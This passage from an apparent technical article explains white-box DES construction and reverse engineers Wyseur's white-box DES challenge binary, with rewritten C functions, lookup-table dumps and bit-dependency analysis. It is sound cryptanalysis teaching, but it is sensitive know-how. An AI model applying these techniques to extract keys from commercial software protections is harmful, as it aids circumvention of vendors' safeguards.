|
|
|
|
Consider the example of a 32 bits buffer. To avoid using a huge
|
|
lookup table, you can consider that this buffer is an 8 bits array.
|
|
Each element of the array will then be obfuscated using a
|
|
corresponding 8 bits lookup table as described below:
|
|
|
|
*****************************************
|
|
* IN[0] || IN[1] || IN[2] || IN[3] *
|
|
*****************************************
|
|
| | | |
|
|
| | | |
|
|
v v v v
|
|
.-------. .-------. .-------. .-------.
|
|
| 2^8 B | | 2^8 B | | 2^8 B | | 2^8 B |
|
|
'-------' '-------' '-------' '-------'
|
|
| | | |
|
|
| | | |
|
|
v v v v
|
|
*****************************************
|
|
* OUT[0] || OUT[1] || OUT[2] || OUT[3] *
|
|
*****************************************
|
|
|
|
I took the example of an 8 bits array but I could have used any
|
|
size. Something really important to understand: the smaller the
|
|
lookup table is, the more it will leak us information. Keep it in
|
|
mind.
|
|
|
|
c) Do you remember when I said that a WB implementation was the exact
|
|
implementation of the corresponding crypto primitive? Well it's not
|
|
true. Or you could say that I was simplifying things ^_~
|
|
|
|
Most of the time (in real life), WB_DES() is a G() o DES() o F()
|
|
where F() and G() are encoding functions. So the first input
|
|
(plaintext) and the last output (ciphertext) may be obfuscated as
|
|
well. This is called an "external encoding" and this is used to
|
|
harden the white-box implementation. Indeed if there were no such
|
|
functions, first & last rounds would be weaker than other rounds.
|
|
This 'academic' protection aims at preventing trivial key recovery
|
|
attacks. A WB implementation without external encoding is said to be
|
|
'naked'.
|
|
|
|
In the context of real life protections, it may (or may not) be
|
|
associated with an additional layer to protect the I/O before &
|
|
after the encryption. It would be bad to intercept the plaintext
|
|
once decrypted, right? Commercial protections almost never use
|
|
native implementations for (at least) this reason. Intercepting a
|
|
plaintext is indeed far easier than recovering the encryption key.
|
|
|
|
In the WB DES case, common academic designs use affine functions,
|
|
encoded or not.
|
|
|
|
|
|
Transforming DES functions
|
|
--------------------------
|
|
|
|
|
|
Now that we've had an overview of how I/O were protected between
|
|
elementary functions, let's see how we can build said functions.
|
|
|
|
a) The partial evaluation
|
|
|
|
This is probably the most intuitive part of the WB implementation. This
|
|
is about 'fusing' the S-Boxes with the round-keys. This is exactly what was
|
|
performed in the previous AES challenge. If you can remember, this is also
|
|
the first example that I gave at the beginning of the paper to introduce
|
|
the white-boxing concept.
|
|
|
|
Using the previous diagram, it means that we want to convert this step:
|
|
|
|
32b 48b 16b
|
|
************** ********************* ********
|
|
* L(r) * * X(r) * * r(r) *
|
|
************** ********************* ********
|
|
| | | |
|
|
| v | |
|
|
| ****** ..... | v
|
|
| * sK *--> . + . | .-------.
|
|
| ****** ..... '-->( Merge )
|
|
| | '-------'
|
|
| v |
|
|
| .-------------. |
|
|
| \ S / |
|
|
| '---------' |
|
|
| | |
|
|
32b v v 32b 32b v
|
|
************** *************** **************
|
|
* L(r) * * Y(r+1) * * R(r) *
|
|
************** *************** **************
|
|
|
|
into this one:
|
|
|
|
|
|
*********************************************
|
|
* state 1 (12 x 8 = 96 bits) *
|
|
*********************************************
|
|
| | | |
|
|
v v v v
|
|
.-----..-----..-----. .-----.
|
|
| T0 || T1 || T2 | ... | T11 |
|
|
'-----''-----''-----' '-----'
|
|
| | | |
|
|
v v v v
|
|
*********************************************
|
|
* state 2 (96 bits) *
|
|
*********************************************
|
|
|
|
|
|
A lookup table Ti (mapping a byte to a byte) is called a 'T-Box'. There
|
|
are two types of T-Box because of the heterogeneity of the operations
|
|
performed on the state:
|
|
|
|
- The non neutral T-box. They are the 8 T-boxes involved with the
|
|
Sbox and the XOR. Each of them is concealing an Sbox and a subkey
|
|
mixing.
|
|
|
|
input:
|
|
-> 6 bits from X(r) to be mixed with the subkey
|
|
-> 1 bit from L(r) or r(r)
|
|
-> 1 bit from L(r) or r(r)
|
|
output:
|
|
-> 4 bits from the Sbox
|
|
-> 2 bits from X(r) taken from the input before being
|
|
mixed with the subkey
|
|
-> 1 bit from L(r) or r(r)
|
|
-> 1 bit from L(r) or r(r)
|
|
|
|
- The neutral T-box which are only used to connect bits of state 1
|
|
to bits of state 2. For example the bits of L(r) are never
|
|
involved in any operation between state 1 and state 2.
|
|
|
|
input:
|
|
-> 1 bit from L(r) or r(r)
|
|
-> 1 bit from L(r) or r(r)
|
|
[...]
|
|
-> 1 bit from L(r) or r(r)
|
|
output:
|
|
-> the input (permuted)
|
|
|
|
Keep in mind that in each case, you have a 'nibble view' of both inputs
|
|
and outputs. Moreover, permutations are used to make harder the
|
|
localization of Sbox upon a simple observation. To have a better
|
|
understanding of this point as well as associated security explanations
|
|
I recommend to read [R09].
|
|
|
|
b) The AT transformation
|
|
|
|
We now want to transform this:
|
|
|
|
|
|
************** *************** ***************
|
|
state 2: * L(r) * * Y(r+1) * * R(r) *
|
|
************** *************** ***************
|
|
| | |
|
|
v | |
|
|
..... .--------. | |
|
|
. + .<---| P |<-' |
|
|
..... '--------' |
|
|
| |
|
|
32b '----------------------------------.
|
|
| | |
|
|
.-------------------|-----------' |
|
|
| 32b v v 32b
|
|
| .-------. .------.
|
|
| / E-box \ ( Select )
|
|
| 32b '-----------' '------'
|
|
| | |
|
|
v 48b v v 16b
|
|
************** ********************* ********
|
|
state 3: * L(r+1) * * X(r+1) * *r(r+1)*
|
|
************** ********************* ********
|
|
|
|
into this:
|
|
|
|
*********************************************
|
|
* state 2 (96 bits) *
|
|
*********************************************
|
|
| | | |
|
|
v v v ... v
|
|
|
|
?????????????????????????????????????????????
|
|
|
|
| | | ... |
|
|
v v v v
|
|
*********************************************
|
|
* state 3 (96 bits) *
|
|
*********************************************
|
|
|
|
|
|
To put it simply, and as said earlier, the combination of the P-Box and
|
|
the following XOR is an affine function. Because we want to use lookup
|
|
tables to implement it we will have to use a matrix decomposition.
|
|
|
|
Let's take an example. You want to protect a 8x8 bit-matrix
|
|
multiplication. This matrix (M) can be divided into 16 2x2 submatrix as
|
|
shown below:
|
|
|
|
.----. .----.----.----.----. .----.
|
|
| Y0 | | A | B | C | D | | X0 |
|
|
.----. .----.----.----.----. '----'
|
|
| Y1 | | E | F | G | H | | X1 |
|
|
.----. = .----.----.----.----. x .----.
|
|
| Y2 | | I | J | K | L | | X2 |
|
|
.----. .----.----.----.----. .----.
|
|
| Y3 | | M | N | O | P | | X3 |
|
|
'----' '----'----'----'----' '----'
|
|
|
|
Vector Y Matrix M Vector X
|
|
|
|
Here the Yi and Xi are 2 bits sub-vectors while A,B,C,etc. are 2x2
|
|
bit-submatrix. Let's focus on Y0, you can write:
|
|
|
|
Y0 = A*X0 [+] B*X1 [+] C*X2 [+] D*X3
|
|
|
|
Because A,B,C and D are constants it's possible to evaluate the
|
|
multiplications and build the corresponding lookup tables (Li). This gives
|
|
the following diagram:
|
|
|
|
****** ****** ****** ******
|
|
* X0 * * X1 * * X2 * * X3 *
|
|
****** ****** ****** ******
|
|
| | | |
|
|
v v v v
|
|
.----. .----. .----. .----.
|
|
| L0 | | L1 | | L3 | | L4 |
|
|
'----' '----' '----' '----'
|
|
| | | |
|
|
| ..... | | ..... |
|
|
'->. + .<-' '->. + .<-'
|
|
..... .....
|
|
| |
|
|
| ..... |
|
|
'------>. + .<------'
|
|
.....
|
|
|
|
|
v
|
|
******
|
|
* Y0 *
|
|
******
|
|
|
|
You may object (and you would be right) that information is still
|
|
leaking and that it would be easy to retrieve the original matrix. Well
|
|
it's true. Thus to avoid this kind of situation two techniques are used:
|
|
|
|
- Each XOR operation is hidden inside a lookup table. In our example,
|
|
|
|
the resulting lookup tables have 2^(2x2) = 16 entries and 2^2 = 4
|
|
outputs (hence a size of 4x16 = 64 bits).
|
|
|
|
- Internal encoding (remember the previous explanations) is used to
|
|
protect the I/O between the lookup tables.
|
|
|
|
Our matrix multiplication becomes:
|
|
|
|
****** ****** ****** ******
|
|
* X0 * * X1 * * X2 * * X3 *
|
|
****** ****** ****** ******
|
|
|
|
| | | |
|
|
v v v v
|
|
|
|
2b 2b 2b 2b
|
|
<----><----> <----><---->
|
|
.----------. .----------.
|
|
\ S0 / \ S1 /
|
|
'------' '------'
|
|
<----> <---->
|
|
2b 2b
|
|
|
|
\ /
|
|
\ /
|
|
| |
|
|
v v
|
|
|
|
2b 2b
|
|
<----><---->
|
|
.---------.
|
|
\ S2 /
|
|
'------'
|
|
<---->
|
|
2b
|
|
|
|
|
|
|
v
|
|
|
|
******
|
|
* Y0 *
|
|
******
|
|
|
|
This is called an 'encoded network'. The main side effect of this
|
|
construction is the important number of lookup tables required.
|
|
|
|
|
|
--[ 6 - Breaking the second case: Wyseur's challenge
|
|
|
|
|
|
----[ 6.1 - Reverse engineering of the binary
|
|
|
|
|
|
As far as I can tell, there is an obvious need to rewrite the binary as
|
|
C code because:
|
|
|
|
- We need to understand exactly what's going on from a mathematical
|
|
point of view and C is more suitable than ASM for that purpose
|
|
|
|
- Rewriting the functions will allow us to manipulate them easily
|
|
with our tools. This is not mandatory though because we could
|
|
be using debugging functions on the original binary itself.
|
|
|
|
Again I won't detail all the reverse engineering process because this
|
|
is neither the main topic nor very hard anyway compared to what you may
|
|
find in the wild (in commercial protections).
|
|
|
|
|
|
High level overview
|
|
--------------------
|
|
|
|
|
|
Let's begin by running the executable:
|
|
|
|
---------------------------------------------------------------------------
|
|
$ ./wbDES.orig
|
|
Usage: ./wbDES.orig <INPUT>
|
|
Where <INPUT> is an 8-byte hexadecimal representation of the input to be
|
|
encrypted
|
|
Example: ./wbDES.orig 12 32 e7 d3 0f f1 29 b3
|
|
---------------------------------------------------------------------------
|
|
|
|
OK so we need to provide the 8 bytes of the plaintext as separate
|
|
arguments in the command line. Hum, weird but OK. When the binary is
|
|
executed, the first thing performed is a conversion of the arguments
|
|
because obviously a suitable buffer for cryptographic operations is
|
|
necessary. The corresponding instructions were rewritten as the following
|
|
C function:
|
|
|
|
---------------------------------------------------------------------------
|
|
// I even emulated a bug, will you find it? ;>
|
|
inline void convert_args(char **argv)
|
|
{
|
|
int i = 0; // ebp-50h
|
|
|
|
while(i <= 7)
|
|
{
|
|
char c;
|
|
c = argv[1+i][0];
|
|
|
|
if(c <= '9')
|
|
{
|
|
c -= '0'; // 0x30 = integer offset in ASCII table
|
|
in[i] = (c<<4);
|
|
}
|
|
else
|
|
{
|
|
c -= ('a' - 10);
|
|
in[i] = (c<<4);
|
|
}
|
|
|
|
c = argv[1+i][1];
|
|
|
|
if(c <= '9')
|
|
{
|
|
c -= '0'; // 0x30 = integer offset in ASCII table
|
|
in[i] ^= c;
|
|
}
|
|
else
|
|
{
|
|
c -= ('a' - 10);
|
|
in[i] ^= c;
|
|
}
|
|
i++;
|
|
}
|
|
return;
|
|
}
|
|
---------------------------------------------------------------------------
|
|
|
|
Once the job is done, an 8 bytes buffer (in[8], the plaintext) is
|
|
built. This is where serious business begins. Thanks to the Control Flow
|
|
Graph provided by your favorite disassembler, you will quickly identify 3
|
|
pseudo functions* :
|
|
|
|
- wb_init(): 0x0804863F to 0x08048C1D
|
|
|
|
This code takes an 8 bytes buffer, returns 1 byte and is called 12
|
|
times by main(). Thanks to this, a 12 x 8 = 96 bits buffer is built.
|
|
As said earlier, the WB is operating on 96 bits states so this is
|
|
most likely the initialization function.
|
|
|
|
- wb_round(): 0x08048C65 to 0x08049731
|
|
|
|
This code takes the 12 bytes buffer generated by wb_init() as input
|
|
and modifies it. The function is called 16 times by main(). Because
|
|
16 is exactly the number of DES rounds, assuming it is the round
|
|
function seems fair.
|
|
|
|
- wb_final(): 0x08049765 to 0x08049E67
|
|
|
|
This code takes the last buffer returned by wb_round() as input and
|
|
returns an 8 bytes buffer which is printed on the screen. So we can
|
|
assume that this is the termination function in charge of building
|
|
the DES ciphertext out of the last internal state.
|
|
|
|
*: There is no 'function' in this program, probably because of an inlining,
|
|
but we can still distinguish logical parts.
|
|
|
|
You may argue that attributing roles to wb_init, wb_round and wb_final
|
|
is a bit hasty but there is something interesting in the code: symbols! In
|
|
each of these functions, an array of lookup tables is used and named
|
|
'Initialize', 'RoundAffineNetwork' and 'FinalRoundNetwork' in the
|
|
corresponding functions. Convenient isn't it?
|
|
|
|
Usually in commercial protections, engineers will take care of little
|
|
details such as this and try to avoid leaking any information. In this case
|
|
however, it can be assumed that the focus is on the cryptography as there
|
|
are neither anti-debugs nor anti-disassembling protections so it should be
|
|
safe to trust our intuition.
|
|
|
|
Thanks to this first reverse engineering step, we're able to rewrite
|
|
a similar main function:
|
|
|
|
-------------------------------- wb_main.c --------------------------------
|
|
unsigned char in[8]; // ebp-1Ch
|
|
unsigned char out[12]; // ebp-28h
|
|
unsigned char temp[12]; // ebp-34h
|
|
|
|
[...]
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
if( argc != 9)
|
|
{
|
|
printf(usage, argv[0], argv[0]);
|
|
return 0;
|
|
}
|
|
|
|
/* Fill the in buffer */
|
|
|
|
convert_args(argv);
|
|
|
|
/* and print it :) */
|
|
|
|
printf("\nINPUT: ");
|
|
for(j=0; j<8; j++)
|
|
printf("%02x ", in[j]);
|
|
|
|
/* WB initialisation */
|
|
|
|
for(j=0; j<12; j++)
|
|
wb_init(j);
|
|
|
|
round_nbr = 0;
|
|
for(round_nbr=0; round_nbr<15; round_nbr++)
|
|
{
|
|
memcpy(temp, out, 12);
|
|
wb_round();
|
|
}
|
|
|
|
/* Building the final buffer */
|
|
|
|
printf("\nOUTPUT: ");
|
|
for(j=0; j<8; j++)
|
|
wb_final(j);
|
|
|
|
printf("\n");
|
|
return 0;
|
|
}
|
|
-------------------------------- wb_main.c --------------------------------
|
|
|
|
One hint to speed up things: always focus first on the size and nature
|
|
of buffers transmitted to the different sub-functions.
|
|
|
|
|
|
Reversing wb_init()
|
|
-------------------
|
|
|
|
|
|
It is now time to have a look at the first function. Again I won't
|
|
detail the whole reverse engineering but rather give you a few
|
|
explanations:
|
|
|
|
- Whenever the function is called, it uses a set of 15 lookup tables
|
|
whose addresses are dependent of both the index in the output array
|
|
and the index of the box itself (amongst the 15 used by the
|
|
function).
|
|
|
|
This means that the sets of tables used to calculate OUT[x] and
|
|
OUT[y] when x!=y are (likely to be) different and for a same OUT[x],
|
|
different tables will be applied to IN[a] and IN[b] if a!=b.
|
|
|
|
- All of these lookup tables are located at:
|
|
|
|
Initialize + 256*idx_box + OUT_idx*0xF00
|
|
where:
|
|
> idx_box is the index of the box amongst the 15
|
|
> OUT_idx is the index in the output array (OUT)
|
|
|
|
- The tables are static. Thanks to this property we can dump them
|
|
whenever we want. I chose to write a little GDB script (available in
|
|
appendix) to perform this task. The export is an array of lookup
|
|
tables (iBOX_i) written in C language.
|
|
|
|
- wb_init() is performing operations on nibbles (4 bits) so for a
|
|
particular output byte (OUT[m]), the generation of the 4 least
|
|
significant bits is independent of the generation of the 4 most
|
|
significant ones.
|
|
|
|
Now with this information in mind, let's have a look at the reversed
|
|
wb_init() function:
|
|
|
|
-------------------------------- wb_init.c --------------------------------
|
|
unsigned char p[8];
|
|
|
|
inline void wb_init(
|
|
int m // ebp-48h
|
|
)
|
|
{
|
|
unsigned int temp0; // ebp-228h
|
|
unsigned int temp1; // ebp-224h
|
|
[...]
|
|
unsigned int temp23; // ebp-1CCh
|
|
|
|
unsigned int eax,ebx,ecx,edx,edi,esi;
|
|
|
|
bzero(p,sizeof p);
|
|
p[0] = iBOX_0[m][in[0]];
|
|
p[1] = iBOX_1[m][in[1]];
|
|
p[2] = iBOX_2[m][in[2]];
|
|
p[3] = iBOX_3[m][in[3]];
|
|
p[4] = iBOX_4[m][in[4]];
|
|
p[5] = iBOX_5[m][in[5]];
|
|
p[6] = iBOX_6[m][in[6]];
|
|
p[7] = iBOX_7[m][in[7]];
|
|
|
|
// First nibble
|
|
|
|
ecx = (0xF0 & p[0]) ^ ( p[1] >> 4 );
|
|
temp3 = 0xF0 & iBOX_8[m][ecx];
|
|
|
|
ecx = (0xF0 & p[2]) ^ ( p[3] >> 4 );
|
|
eax = iBOX_9[m][ecx] >> 4;
|
|
ecx = temp3 ^ eax;
|
|
temp6 = 0xF0 & iBOX_12[m][ecx];
|
|
|
|
ecx = (0xF0 & p[4]) ^ ( p[5] >> 4 );
|
|
eax = iBOX_10[m][ecx] >> 4;
|
|
ecx = temp6 ^ eax;
|
|
edi = 0xF0 & iBOX_13[m][ecx];
|
|
|
|
ecx = (0xF0 & p[6]) ^ ( p[7] >> 4 );
|
|
eax = iBOX_11[m][ecx] >> 4;
|
|
ecx = edi ^ eax;
|
|
edx = iBOX_14[m][ecx];
|
|
esi = edx & 0xFFFFFFF0;
|
|
|
|
// Second nibble
|
|
|
|
ecx = (0x0F & p[1]) ^ (0xF0 & ( p[0] << 4 ));
|
|
temp15 = 0xF0 & ( iBOX_8[m][ecx] << 4);
|
|
|
|
ecx = (0x0F & p[3]) ^ (0xF0 & ( p[2] << 4 ));
|
|
eax = 0x0F & ( iBOX_9[m][ecx] );
|
|
ecx = temp15 ^ eax;
|
|
temp18 = 0xF0 & ( iBOX_12[m][ecx] << 4 );
|
|
|
|
ecx = (0x0F & p[5]) ^ (0xF0 & ( p[4] << 4 ));
|
|
eax = 0x0F & iBOX_10[m][ecx];
|
|
ecx = temp18 ^ eax;
|
|
temp21 = 0xF0 & (iBOX_13[m][ecx] << 4);
|
|
|
|
ecx = (0x0F & p[7]) ^ (0xF0 & ( p[6] << 4 ));
|
|
eax = 0x0F & ( iBOX_11[m][ecx] );
|
|
ecx = temp21 ^ eax;
|
|
eax = 0x0F & ( iBOX_14[m][ecx] );
|
|
|
|
// Output is the combination of both nibbles
|
|
|
|
eax = eax ^ esi;
|
|
out[m] = (char)eax;
|
|
return;
|
|
}
|
|
-------------------------------- wb_init.c --------------------------------
|
|
|
|
In a nutshell:
|
|
- & (AND) and >>/<< (SHIFTS) are used to operate on nibbles
|
|
- ^ (XOR) are used to concatenate nibbles in order to build the
|
|
entries (which are bytes) of the iBOX_i lookup tables
|
|
- The output byte out[m] is the concatenation of two independently
|
|
calculated nibbles
|
|
|
|
To understand exactly what's going on, a drawing is much clearer. So
|
|
thanks to asciio [R11] this gives us something like this:
|
|
|
|
|
|
******** ******** ******** ******** ******** ******** ******** ********
|
|
* IN_0 * * IN_1 * * IN_2 * * IN_3 * * IN_4 * * IN_5 * * IN_6 * * IN_7 *
|
|
******** ******** ******** ******** ******** ******** ******** ********
|
|
|
|
| | | | | | | |
|
|
H | H | H | H | H | H | H | H |
|
|
v v v v v v v v
|
|
|
|
<----------------------------- 8x8 = 64 bits --------------------------->
|
|
|
|
.-------..-------. .-------..-------. .-------..-------. .-------..-------.
|
|
\iBox_0 /\iBox_1 / \iBox_2 /\iBox_3 / \iBox_4 /\iBox_5 / \iBox_6 /\iBox_7 /
|
|
'-----' '-----' '-----' '-----' '-----' '-----' '-----' '-----'
|
|
|
|
<----------------------------- 8x4 = 32 bits ------------------------->
|
|
|
|
\ / \ / \ / \ /
|
|
H \ / H H \ / H H \ / H H \ / H
|
|
v v v v v v v v
|
|
.---------. .---------. .---------. .---------.
|
|
\ iBox_8 / \ iBox_9 / \ iBox_10 / \ iBox_11 /
|
|
'-------' '-------' '-------' '-------'
|
|
|
|
<------------------------- 4x4 = 16 bits ---------------------->
|
|
|
|
\ / \ /
|
|
H \ / H H \ / H
|
|
\ / \ /
|
|
v v v v
|
|
.---------. .---------.
|
|
\ iBox_12 / \ iBox_13 /
|
|
'-------' '-------'
|
|
|
|
<--------------- 2x4 = 8 bits ----------->
|
|
|
|
\ /
|
|
\ H H /
|
|
'---------. .---------'
|
|
| |
|
|
v v
|
|
.---------.
|
|
\ iBox_14 /
|
|
'-------'
|
|
|
|
<- 1x4 bits ->
|
|
|
|
\
|
|
H \ 8 bits
|
|
\ <--------->
|
|
Concatenation '---> ***********
|
|
of nibbles * OUT_x *
|
|
.---> ***********
|
|
/
|
|
L /
|
|
/
|
|
|
|
<- 1x4 bits ->
|
|
|
|
.-------.
|
|
/ iBox_14 \
|
|
'---------'
|
|
^ ^
|
|
L | | L
|
|
.--------' '--------.
|
|
/ \
|
|
/ \
|
|
|
|
<--------------- 2x4 = 8 bits ----------->
|
|
|
|
.-------. .-------.
|
|
/ iBox_12 \ / iBox_13 \
|
|
'---------' '---------'
|
|
|
|
^ ^ ^ ^
|
|
/ \ / \
|
|
L / \ L L / \ L
|
|
/ \ / \
|
|
|
|
<------------------------- 4x4 = 16 bits ---------------------->
|
|
|
|
.-------. .-------. .-------. .-------.
|
|
/ iBox_8 \ / iBox_9 \ / iBox_10 \ / iBox_11 \
|
|
'---------' '---------' '---------' '---------'
|
|
|
|
^ ^ ^ ^ ^ ^ ^ ^
|
|
L / \ L L / \ L L / \ L L / \ L
|
|
/ \ / \ / \ / \
|
|
|
|
<----------------------------- 8x4 = 32 bits ------------------------->
|
|
|
|
.-----. .-----. .-----. .-----. .-----. .-----. .-----. .-----.
|
|
/iBox_0 \/iBox_1 \ /iBox_2 \/iBox_3 \ /iBox_4 \/iBox_5 \ /iBox_6 \/iBox_7 \
|
|
'-------''-------' '-------''-------' '-------''-------' '-------''-------'
|
|
|
|
<----------------------------- 8x8 = 64 bits --------------------------->
|
|
|
|
^ ^ ^ ^ ^ ^ ^ ^
|
|
L | L | L | L | L | L | L | L |
|
|
| | | | | | | |
|
|
|
|
******** ******** ******** ******** ******** ******** ******** ********
|
|
* IN_0 * * IN_1 * * IN_2 * * IN_3 * * IN_4 * * IN_5 * * IN_6 * * IN_7 *
|
|
******** ******** ******** ******** ******** ******** ******** ********
|
|
|
|
In this case, 'H' is used as a suffix to identify the most significant
|
|
(High) nibble of a particular byte. As you can see, the input (respectively
|
|
the output) is not an 8 (respectively 12) _bytes_ array but rather a 16
|
|
(respectively 24) _nibbles_ array. Indeed, each byte array (iBox_i) stores
|
|
exactly 2 lookup tables. We say that such lookup tables are 'compacted',
|
|
see [R14] for additional details.
|
|
|
|
|
|
Global description
|
|
-------------------
|
|
|
|
|
|
Good news guys, the wb_init(), wb_round() and wb_final() functions are
|
|
composed of the same nibble oriented patterns. So basically wb_round() and
|
|
wb_final() contain also AT applied to a nibbles array and the end of the
|
|
reverse engineering is quite straightforward.
|
|
|
|
Remark: Manipulating nibbles implies that the internal encoding is
|
|
performed using 4 bits to 4 bits bijections.
|
|
|
|
Again thanks to asciio, we're able to draw something like that:
|
|
|
|
|
|
8 x (2x4) = 64 bits
|
|
<---------------------------------->
|
|
|
|
2x4 = 8 bits
|
|
<---->
|
|
|
|
.----------------------------------. .-----------.
|
|
| .-----. .-----. .-----. | | INPUT |
|
|
.----| IN0 | | IN1 | ... | IN7 | | '-----------'
|
|
| | '-----' '-----' '-----' | |
|
|
v '------------|----------------|----' v
|
|
| v | .------------.
|
|
|--------<---------------<-------' ( wb_init func )
|
|
| '------------'
|
|
.-----v---------------------------------------------. |
|
|
|.--------. .--------. .---------.| |
|
|
|| STG0_0 | | STG0_1 | ... | STG0_11 || |
|
|
|'--------' '--------' '---------'| |
|
|
'-----|---------|-----------------------------|-----' |
|
|
| | | v
|
|
| v | .-------------.
|
|
| | | ( wb_round func )
|
|
'--->-----|-------<---------------------' '-------------'
|
|
| |
|
|
.---------------|------------------------------------. |
|
|
|.--------. .---v----. .---------.| |
|
|
|| STG1_0 | | STG1_1 | ... | STG1_11 || |
|
|
|'--------' '--------' '---------'| |
|
|
'----------------------------------------------------' |
|
|
|
|
|
2x4bits |
|
|
<--------> 12 x (2x4) = 96 bits |
|
|
<----------------------------------------------------> |
|
|
v
|
|
.-------------.
|
|
... 15x ( wb_round func )
|
|
'-------------'
|
|
.----------------------------------------------------. |
|
|
|.---------..---------. .----------.| |
|
|
|| STG14_0 || STG14_1 | ... | STG14_11 || |
|
|
|'---------''---------' '----------'| |
|
|
'-----|--------|-------------------------------|-----' v
|
|
| v | .-------------.
|
|
| | | ( wb_final func )
|
|
'----->-----<----------------------------' '-------------'
|
|
| |
|
|
.-----|----------------------------. v
|
|
|.----v-. .------. .------.| .----------.
|
|
|| OUT0 | | OUT1 | ... | OUT7 || | OUTPUT |
|
|
|'------' '------' '------'| '----------'
|
|
'----------------------------------'
|
|
|
|
2x4bits
|
|
<------>
|
|
8 x (2x4) = 64 bits
|
|
<---------------------------------->
|
|
|
|
|
|
Writing the C code corresponding to these functions is not difficult
|
|
though a bit boring (not to mention prone to mistakes). I was able to
|
|
rewrite the whole binary in a few hours (and it took me almost the same
|
|
time to make it work :O). The source code is available in the appendix.
|
|
|
|
Remark: I've not tried to use Hex-Rays on the binary but it could be
|
|
interesting to know if the decompilation is working out of the box.
|
|
|
|
It's easy to see that my source code is functionally equivalent on the
|
|
input/output behavior:
|
|
|
|
---------------------------------------------------------------------------
|
|
$ ./wbDES.orig 11 22 ff dd 00 11 26 93 <- the original
|
|
|
|
INPUT: 11 22 ff dd 00 11 26 93
|
|
OUTPUT: 04 e9 ff 8e 2e 98 6c 6b
|
|
$ make
|
|
$ ./wbdes.try 11 22 ff dd 00 11 26 93 <- my copy :)
|
|
|
|
INPUT: 11 22 ff dd 00 11 26 93
|
|
OUTPUT: 04 e9 ff 8e 2e 98 6c 6b
|
|
$
|
|
---------------------------------------------------------------------------
|
|
|
|
Now let's try to break the white-box. We will proceed in two steps
|
|
which is exactly how I handled the challenge. What is described is how I
|
|
proceeded as I wasn't following academic publications. I don't know if it's
|
|
a better approach or not. It's just my way of doing things and because I'm
|
|
not a cryptographer, it's _practical_. If you prefer more _theoretical_
|
|
solutions, please refer to [R04] for a list of papers dealing with the
|
|
subject.
|
|
|
|
|
|
----[ 6.2 - The discovery step
|
|
|
|
|
|
First of all, let's gather some information about this white-box. There
|
|
is a first immediate observation: there is no explicit T-box step which
|
|
proves that it is combined with the AT step in a same function. This is an
|
|
optimization which was historically proposed in [R14] in order to protect
|
|
the output of the T-box and, as a result, to mitigate the so-called
|
|
statistical bucketing attack described in [R09] while compressing the
|
|
implementation by merging operations.
|
|
|
|
I used this information as well as the size of the binary (which is a
|
|
bit more than the size of the lookup tables) as indicators of how recent
|
|
the design could be. I didn't have the time to read all the white-box
|
|
related papers (although there are not a thousand of them).
|
|
|
|
|
|
Analyzing the wb_init()
|
|
-----------------------
|
|
|
|
|
|
Earlier, I've made assumptions about wb_init() and wb_round() but at
|
|
this point little is really known about them. Now is the time to play a bit
|
|
with wb_init() and by playing I mean discovering the "link" between the
|
|
input (plaintext) and the input of wb_round() which will be called "stage0"
|
|
from now on.
|
|
|
|
Let's begin by a quick observation. As said before, for each output
|
|
byte of wb_init(), there is a corresponding set of 14 (condensed) iBox_i.
|
|
A simple glance at these boxes is enough to determine that for each set,
|
|
the 8 first iBox_i have a very low entropy. Conversely, the remaining 5
|
|
ones have a high entropy:
|
|
|
|
---------------------------------------------------------------------------
|
|
[...]
|
|
|
|
unsigned char iBOX_3[12][256] = {
|
|
{
|
|
0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
|
|
0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
|
|
0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
|
|
0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
|
|
0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
|
|
[...]
|
|
0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,
|
|
0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,
|
|
},
|
|
|
|
[...]
|
|
|
|
unsigned char iBOX_8[12][256] = {
|
|
{
|
|
0x13,0xdf,0xf9,0x38,0x61,0xe2,0x44,0x9e,0xc0,0x2a,0x0b,0xb7,0x7c,0xad,
|
|
0x56,0x85,0x96,0xbe,0x8b,0x04,0x27,0xcd,0xa8,0x1f,0xec,0x65,0x39,0xd1,
|
|
0x50,0x42,0x73,0xfa,0x4a,0x52,0x04,0x8b,0xcc,0x2f,0x19,0xad,0x67,0xe3,
|
|
[...]
|
|
0x8a,0x08,0xbd,0x59,0x36,0xf1,0xef,0x45,0x13,0xd4,0x90,0x67,0xae,0x76,
|
|
0x3c,0xf7,0xe4,0x65,0x91,0x43,0x2b,0xcd,0x80,0x58,0xd9,0x1a,0xbf,0x02,
|
|
},
|
|
|
|
[...]
|
|
---------------------------------------------------------------------------
|
|
|
|
The example shows us that iBOX_3[0] has only 2 possibles values: 0xf7
|
|
for any index inferior or equal to 127 and 0xf1 for the remaining ones.
|
|
Said otherwise, this box is a bit filter:
|
|
|
|
- High output nibble: only 1 possible value (0xf) => no bit chosen
|
|
- Low output nibble: 2 possible values (0x1, 0x7) => the input's
|
|
MSB is chosen
|
|
|
|
Let's visualize the effect of the 8 first iBox_i for every output
|
|
nibble. To see if the particular bit at position 'i' is involved in the LUT
|
|
'p' then you can compute:
|
|
|
|
- p[0]&0xf0 and p[(1<<i)]&0xf0 ; influence on the High nibble
|
|
- p[0]&0x0f and p[(1<<i)]&0x0f ; influence on the Low nibble
|
|
|
|
In each case, if the bit at the position 'i' is indeed involved then
|
|
both results will be different. I implemented it in entropy.c
|
|
(see appendix):
|
|
|
|
---------------------------------------------------------------------------
|
|
$ ./entropy
|
|
|
|
[+] Link between IN and OUT arrays
|
|
OUT[0] (high) is composed of:
|
|
-> bit 6
|
|
-> bit 49
|
|
-> bit 57
|
|
-> bit 56
|
|
OUT[0] (low) is composed of:
|
|
-> bit 24
|
|
-> bit 32
|
|
-> bit 40
|
|
-> bit 48
